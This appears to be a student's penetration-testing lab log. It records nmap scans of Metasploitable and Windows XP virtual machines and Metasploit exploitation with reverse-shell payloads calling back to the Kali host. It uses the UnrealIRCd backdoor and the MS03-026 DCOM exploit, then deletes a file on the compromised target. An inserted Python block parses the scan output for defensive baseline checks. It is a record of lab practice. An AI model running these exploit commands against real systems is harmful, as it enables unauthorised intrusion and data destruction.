pentest log

friday 19

re-imported kali VM (newest 2021 version may have different settings from 2020.4)
checked that all VMs are using NatNetwork
launched KaliVM and msVM
logged in to both VMs
obtained IP addresses for both machines using ifconfig: msVM is 10.0.2.4, KaliVM is 10.0.2.15
pinged from KaliVM to msVM successfully
created target.txt file on msVM and inserted some text, saved the file in home directory
used touch and then nano editor
nmap
carried out nmap scan of target
└─$ nmap -v -A 10.0.2.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-19 06:45 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating Ping Scan at 06:45
Scanning 10.0.2.4 [2 ports]
Completed Ping Scan at 06:45, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:45
Completed Parallel DNS resolution of 1 host. at 06:45, 0.02s elapsed
Initiating Connect Scan at 06:45
Scanning 10.0.2.4 [1000 ports]
Discovered open port 445/tcp on 10.0.2.4
Discovered open port 25/tcp on 10.0.2.4
Discovered open port 5900/tcp on 10.0.2.4
Discovered open port 3306/tcp on 10.0.2.4
Discovered open port 139/tcp on 10.0.2.4
Discovered open port 53/tcp on 10.0.2.4
Discovered open port 21/tcp on 10.0.2.4
Discovered open port 23/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 111/tcp on 10.0.2.4
Discovered open port 6667/tcp on 10.0.2.4
Discovered open port 1524/tcp on 10.0.2.4
Discovered open port 1099/tcp on 10.0.2.4
Discovered open port 513/tcp on 10.0.2.4
Discovered open port 2049/tcp on 10.0.2.4
Discovered open port 512/tcp on 10.0.2.4
Discovered open port 514/tcp on 10.0.2.4
Discovered open port 5432/tcp on 10.0.2.4
Discovered open port 8009/tcp on 10.0.2.4
Discovered open port 2121/tcp on 10.0.2.4
Discovered open port 6000/tcp on 10.0.2.4
Discovered open port 8180/tcp on 10.0.2.4
zenmap not available
explore legion instead (runs with sudo)
legion allows session result to be saved to file
auto screenshots services such as web server home page, tomcat home page, db and ftp
list of cve vulnerabilities with hyperlink to cve database
setting up metasploit framework
/etc/init.d/postgresql start
sudo msfdb init
msfconsole
find an exploit
search unrealircd
> exploit/unix/irc/unreal_ircd_3281_backdoor
deploy exploit
use exploit/unix/irc/unreal_ircd_3281_backdoor
configure
set RHOST 10.0.2.4
set LHOST 10.0.2.15
show payloads
> Compatible Payloads
===================

   #   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                    normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                               normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                    normal  No     Unix Command Shell, Bind TCP (via Ruby)
   ..
   11  cmd/unix/reverse_ssl_double_telnet                    normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
deliver payload
set payload cmd/unix/reverse
exploit
explore target using shell
ifconfig
whoami
pwd
cd /
cd home
ls
cd msfadmin
cat target.txt
touch hacked.txt
rm target.txt
ls
finishing metasploitable session
ctrl + c
quit

monday 22

Setting up Kali and Windows


Kali settings: internal network
Windows sp0: network
Secret file on Windows
TCP/IP properties for Windows
Kali Net settings (right click network icon in top right)
check for confirmation of network (manual setting for ip4)
Testing Kali - Windows network connection: ping

Hacking Windows from Kali

nmap scan needs sudo
sudo nmap -sN 10.0.2.0/24
port scanner
sudo nmap -PS 10.0.2.16
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:19 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00032s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
5000/tcp open  upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
fingerprint the target
└─$ sudo nmap -O -osscan-guess 10.0.2.16
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:22 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
5000/tcp open  upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000::- cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::- cpe:/o:microsoft:windows_xp::sp1
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
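The nmap output captured above comes in two shapes: the verbose "Discovered open port N/tcp on HOST" progress lines from the Friday scan, and the "PORT STATE SERVICE" table plus MAC and "OS details" lines from the Monday scans. The following is an added example, not part of this log and not an nmap tool: a small Python parser that reads either shape into one host record and then compares the open ports against an expected-services baseline, which is how a defender turns the same scan into an exposure check (here a surprise RDP, NFS/IIS and UPnP port on a host that should only expose SMB). The sample inputs are excerpts of the scans recorded above; the baseline set is an assumption chosen for the illustration.

```python
import re
from dataclasses import dataclass, field

# nmap -v progress line: "Discovered open port 445/tcp on 10.0.2.4"
DISCOVERED_RE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")
# Row of the normal-output port table: "135/tcp  open  msrpc"
TABLE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|open\|filtered)\s+(\S+)")
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")
OS_RE = re.compile(r"^OS details: (.+)$")

# Excerpt of the Monday "sudo nmap -O" output from the log above.
WINDOWS_SCAN = """\
Nmap scan report for 10.0.2.16
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
5000/tcp open  upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
"""

# Excerpt of the Friday "nmap -v -A" progress output from the log above.
VERBOSE_SCAN = """\
Initiating Connect Scan at 06:45
Scanning 10.0.2.4 [1000 ports]
Discovered open port 445/tcp on 10.0.2.4
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 6667/tcp on 10.0.2.4
"""

# Assumed baseline for the illustration: the only services this Windows lab
# host is expected to expose (NetBIOS/SMB). Anything else is flagged.
BASELINE = {(135, "tcp"), (139, "tcp"), (445, "tcp")}


@dataclass
class HostReport:
    address: str = ""
    open_ports: dict = field(default_factory=dict)  # (port, proto) -> service name or ""
    mac: str = ""
    os_details: str = ""


def parse_nmap_output(text):
    """Parse normal or verbose nmap output into a HostReport.

    Verbose 'Discovered open port' lines only give the port, so the service
    name is left empty; table rows fill it in when present.
    """
    report = HostReport()
    for raw in text.splitlines():
        line = raw.strip()
        if m := REPORT_RE.match(line):
            report.address = m.group(1)
        elif m := DISCOVERED_RE.search(line):
            port, proto, addr = m.groups()
            report.address = report.address or addr
            report.open_ports.setdefault((int(port), proto), "")
        elif m := TABLE_RE.match(line):
            port, proto, state, service = m.groups()
            if state == "open":
                report.open_ports[(int(port), proto)] = service
        elif m := MAC_RE.match(line):
            report.mac = m.group(1)
        elif m := OS_RE.match(line):
            report.os_details = m.group(1)
    return report


def unexpected_ports(report, allowed):
    """Return the open (port, proto) pairs not present in the allowed baseline, sorted."""
    return sorted(p for p in report.open_ports if p not in allowed)


if __name__ == "__main__":
    host = parse_nmap_output(WINDOWS_SCAN)
    print(f"{host.address} ({host.mac}) {host.os_details}")
    for port, proto in unexpected_ports(host, BASELINE):
        print(f"  unexpected: {port}/{proto} {host.open_ports[(port, proto)]}")
```

Feeding the verbose Friday output through the same function gives the port set without service names, which is enough for the baseline comparison; the table form adds the service column used in the report line.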
Vulnerability
Exploitation
msfconsole
search 'MS03-026'
use exploit/windows/dcerpc/ms03_026_dcom
show options
set rhost 10.0.2.16
set lhost 10.0.2.15
show payloads (displays 183 items of different categories in a wide listing)
set payload windows/meterpreter/reverse_tcp
exploit
(session closes / dies, Windows closes and restarts)

